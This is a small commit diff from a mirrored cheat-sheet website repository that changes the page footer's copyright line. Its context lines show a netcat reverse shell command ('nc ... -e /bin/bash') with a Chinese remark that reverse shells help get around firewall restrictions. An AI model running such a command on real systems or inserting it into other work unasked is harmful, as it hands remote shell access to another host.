mirror of
https://github.com/jaywcjlove/reference.git
synced 2025-06-19 21:51:20 +08:00
website: update footer. #102 5c8b11767f
This commit is contained in:
@ -215,7 +215,7 @@
|
||||
<pre class="language-shell"><code class="language-shell code-highlight"><span class="code-line">$ <span class="token function">nc</span> <span class="token number">192.168</span>.1.9 <span class="token number">8000</span> <span class="token parameter variable">-v</span> <span class="token parameter variable">-e</span> /bin/bash
|
||||
</span></code></pre>
|
||||
<p>反向 <code>shell</code> 通常用于绕过防火墙限制,例如阻止入站连接</p>
|
||||
</div></div></div></div></div></div></div><footer class="footer-wrap"><footer class="max-container">© 2022 Kenny Wang, All rights reserved.</footer></footer><script>
|
||||
</div></div></div></div></div></div></div><footer class="footer-wrap"><footer class="max-container">© 2022 Kenny Wang.</footer></footer><script>
|
||||
if(('onhashchange' in window) && ((typeof document.documentMode==='undefined') || document.documentMode==8)) {
|
||||
window.onhashchange = function () {
|
||||
anchorPoint()
|
||||
|
Reference in New Issue
Block a user